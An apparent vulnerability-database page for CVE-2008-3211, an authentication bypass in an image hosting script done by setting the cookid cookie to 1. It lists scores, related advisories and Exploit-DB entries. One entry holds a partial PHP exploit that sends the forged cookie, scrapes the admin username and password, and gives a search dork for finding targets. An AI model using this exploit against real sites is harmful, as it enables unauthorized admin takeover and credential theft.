CVE-2008-3211
published 2008-07-18CVE-2008-3211: Scripteen Free Image Hosting Script 1.2 and 1.2.1 allows remote attackers to bypass authentication and gain administrative access by setting the cookid cookie…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.26%
86.8th percentile
Scripteen Free Image Hosting Script 1.2 and 1.2.1 allows remote attackers to bypass authentication and gain administrative access by setting the cookid cookie value to 1.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scripteen | free_image_hosting_script | — | — |
| scripteen | free_image_hosting_script | — | — |
| scripteen | free_image_hosting_script | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3w8m-pw3c-4478: admin/header
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-4987 [HIGH] CWE-287 GHSA-3w8m-pw3c-4478: admin/header
admin/header.php in Scripteen Free Image Hosting Script 2.3 allows remote attackers to bypass authentication and gain administrative access by setting the cookgid cookie value to 1, a different vector than CVE-2008-3211.
GHSA
GHSA-qjq6-qxx8-cgh5: Scripteen Free Image Hosting Script 1
ghsa_unreviewed·2022-05-01
CVE-2008-3211 [HIGH] CWE-287 GHSA-qjq6-qxx8-cgh5: Scripteen Free Image Hosting Script 1
Scripteen Free Image Hosting Script 1.2 and 1.2.1 allows remote attackers to bypass authentication and gain administrative access by setting the cookid cookie value to 1.
No detection rules found.
Exploit-DB
Phoenician Casino FlashAX - ActiveX Remote Code Execution
exploitdb·2008-12-17
CVE-2008-5691 Phoenician Casino FlashAX - ActiveX Remote Code Execution
Phoenician Casino FlashAX - ActiveX Remote Code Execution
---
####################### Phoenician Casino FlashAX ActiveX Remote Code Execution FTW! #########
######By: e.wiZz!
######Blog: kidnap't by government .ba
######Business mail :) [email protected]
######Info: you can erase my blog,arrest me,do whatever...i'm still Bosnian Idiot FTW!.
######Greetz: Coolest guys around: aluigi,shinnai and hakin9.org
In the wild....
#############################################################
Author will be responsible for anything you do with calc.exe
#############################################################
ProductName FlashAX Module
ProductVersion 1.0.0.7
Report for Clsid: {D8089245-3211-40F6-819B-9E5E92CD61A2}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObj
Exploit-DB
Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber
exploitdb·2008-07-13
CVE-2008-3212 Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber
Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber
---
Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit
Coded By RMx - Liz0ziM
Web:www.biyosecurity.com
Dork:"Powered by Scripteen Free Image Hosting Script V1.2"
TARGET HOST:
Example:www.xxxx.com
TARGET PATH:
Example:/ or /scriptpath/
Sending Exploit..';
$packet ="GET ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cookid=1\r\n";
$packet.="Connection: Close\r\n\r\n";
yolla($host,$packet);
preg_match_all($desen,$veri,$cik);
$ad=$cik[1][0];
$sifre=$cik[1][1];
if($ad AND $sifre){
echo '
Exploit succeeded...
Admin Username:'.$ad.'
Admin Password:'.$sifre.'';
}
else
{
echo 'Exploit Failed !';
}
}
?>
# milw0rm.com [2008-07-13]
No writeups or analysis indexed.
http://secunia.com/advisories/31083http://securityreason.com/securityalert/4014http://www.securityfocus.com/bid/30217http://www.vupen.com/english/advisories/2008/2106/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43771https://www.exploit-db.com/exploits/6070http://secunia.com/advisories/31083http://securityreason.com/securityalert/4014http://www.securityfocus.com/bid/30217http://www.vupen.com/english/advisories/2008/2106/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43771https://www.exploit-db.com/exploits/6070
2008-07-18
Published